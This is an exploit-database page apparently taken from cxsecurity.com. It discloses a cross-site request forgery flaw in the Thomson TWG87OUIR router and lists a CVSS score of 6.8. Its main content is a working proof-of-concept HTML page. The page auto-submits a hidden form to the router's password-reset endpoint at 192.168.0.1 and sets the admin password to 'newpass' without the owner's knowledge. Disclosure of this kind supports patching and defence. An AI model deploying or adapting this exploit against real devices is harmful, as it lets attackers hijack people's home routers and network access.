Thomson TWG87OUIR Cross Site Request Forgery

2014-06-27 / 2014-07-04
Credit: nopesled
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-352


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

#Author: nopesled #Date: 24/06/14 #Vulnerability: POST Password Reset CSRF #Tested on: Thomson TWG87OUIR (Hardware Version) <html> <head> <title>Thomson TWG87OUIR CSRF</title> </head> <body> <form name="exploit" method="post" action="http://192.168.0.1/goform/RgSecurity"> <input type="hidden" name="HttpUserId" value="" /> <input type="hidden" name="Password" value="newpass" /> <input type="hidden" name="PasswordReEnter" value="newpass" /> <input type="hidden" name="RestoreFactoryNo" value-="0x00" /> </form> <script type="text/javascript"> document.exploit.submit(); </script> </body> </html>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top